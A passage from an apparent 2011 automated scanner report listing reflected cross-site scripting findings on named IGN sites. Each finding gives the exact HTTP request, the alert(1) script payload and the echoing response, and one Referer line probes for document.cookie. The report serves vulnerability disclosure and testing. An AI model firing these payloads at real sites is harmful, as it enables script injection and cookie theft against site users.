MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
function google_ad_request_done(google_ads) { var i = 0; if (google_ads == null || google_ads.length == 0) return; var ctl = null; var str = ''; str = ''; document.write('<STYLE> #ad- ...[SNIP]... re=nl-NL&__ipculture=nl-NL"; var google_ad_type = "text"; var google_ad_client = "ca-fim_ign_intl_emea_asia_js"; var google_max_num_ads = 4; var google_ad_output = "js"; var __preferredculture = "nl-nle8d34";alert(1)//b1eedcf262"; var afcxml = "false"; var google_adtest = "off"; var google_ed = ""; var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js"; var google_safe = "high"; var google_encoding = "utf8"; document.write( ...[SNIP]...
1.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fimserve.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c781b%3balert(1)//80b384a2d70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c781b;alert(1)//80b384a2d70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?placement=fim_ign_hub2&c781b%3balert(1)//80b384a2d70=1 HTTP/1.1 Host: fimserve.ign.com Proxy-Connection: keep-alive Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243
function google_ad_request_done(google_ads) { var i = 0; if (google_ads == null || google_ads.length == 0) return; var ctl = null; var str = ''; str = ''; document.write('<STYLE> #ad- ...[SNIP]... ype = "text"; var google_ad_client = "ca-fim_ign_intl_emea_asia_js"; var google_encoding = "utf8"; var google_ad_output = "js"; var afcxml = "false"; var google_adtest = "off"; var google_ed = ""; var c781b;alert(1)//80b384a2d70 = 1; var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js"; var google_safe = "high"; var google_max_num_ads = 4; document.write('<script type="text/javascript" language="JavaScript" src="http://pa ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47353<script>alert(1)</script>ff7250afcdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1 Host: fonts.ignimgs.com Proxy-Connection: keep-alive Referer: http://www.ign.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000819 Content-Length: 68 Cache-Control: max-age=31536000 Date: Mon, 07 Feb 2011 01:02:35 GMT Connection: close
Not Found: /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 791d8<script>alert(1)</script>1d99e800ce7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1 Host: fonts.ignimgs.com Proxy-Connection: keep-alive Referer: http://www.ign.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000773 Content-Length: 68 Cache-Control: max-age=31536000 Date: Mon, 07 Feb 2011 01:02:36 GMT Connection: close
Not Found: /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4490<script>alert(1)</script>adea6fcc8da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da HTTP/1.1 Host: fonts.ignimgs.com Proxy-Connection: keep-alive Referer: http://www.ign.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.001293 Content-Length: 63 Cache-Control: max-age=31536000 Date: Mon, 07 Feb 2011 01:11:16 GMT Connection: close
Not Found: /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da
1.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1146317p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77882"><script>alert(1)</script>eae0eba9c8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1146317p1.html?77882"><script>alert(1)</script>eae0eba9c8b=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1146317p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea3b2"-alert(1)-"4bf55089e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... coreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://games.ign.com/articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1147934c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd916"><script>alert(1)</script>af064e2c58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147934c.html?dd916"><script>alert(1)</script>af064e2c58b=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1147934c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fd5c"-alert(1)-"ff30ee90d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... scoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://games.ign.com/articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1147934p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92fe"-alert(1)-"f38442978de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... coreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://games.ign.com/articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/articles/114/1147934p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf573"><script>alert(1)</script>6d05b099dbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147934p1.html?bf573"><script>alert(1)</script>6d05b099dbb=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/ratings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"77dfbb9df23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Ratings and Re ...[SNIP]... if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://games.ign.com/ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.ign.com
Path:
/ratings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eae1"><script>alert(1)</script>279a1848484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ratings.html?3eae1"><script>alert(1)</script>279a1848484=1 HTTP/1.1 Host: games.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Ratings and Re ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/ratings.html?3eae1"><script>alert(1)</script>279a1848484=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gear.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b863c"><script>alert(1)</script>fcd2abe112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b863c"><script>alert(1)</script>fcd2abe112b=1 HTTP/1.1 Host: gear.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gear.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75409"-alert(1)-"034fd7420f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?75409"-alert(1)-"034fd7420f0=1 HTTP/1.1 Host: gear.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Gear: Previews ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://gear.ign.com/?75409"-alert(1)-"034fd7420f0=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gear.ign.com
Path:
/articles/114/1147945p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7c9"><script>alert(1)</script>5f62f771290 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147945p1.html?bc7c9"><script>alert(1)</script>5f62f771290=1 HTTP/1.1 Host: gear.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gear.ign.com
Path:
/articles/114/1147945p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba9e"-alert(1)-"ed46ab3021e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1 HTTP/1.1 Host: gear.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... scoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://gear.ign.com/articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c05a"-alert(1)-"dc219b0b059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9c05a"-alert(1)-"dc219b0b059=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/?9c05a"-alert(1)-"dc219b0b059=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a5bc"><script>alert(1)</script>3d8e7077c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4a5bc"><script>alert(1)</script>3d8e7077c65=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/?4a5bc"><script>alert(1)</script>3d8e7077c65=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14235018/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a84"><script>alert(1)</script>564c920195a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14235018/?47a84"><script>alert(1)</script>564c920195a=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14235018/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f02f6"-alert(1)-"f03fa2e9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14293266/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc77b"-alert(1)-"9efbf2b5b8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14293266/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53311"><script>alert(1)</script>b8a60daf5cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14293266/?53311"><script>alert(1)</script>b8a60daf5cb=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14341976/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a72d"-alert(1)-"d0fe4cf0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14341976/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b0f8"><script>alert(1)</script>c82848e0415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14341976/?2b0f8"><script>alert(1)</script>c82848e0415=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14349501/
Issue detail
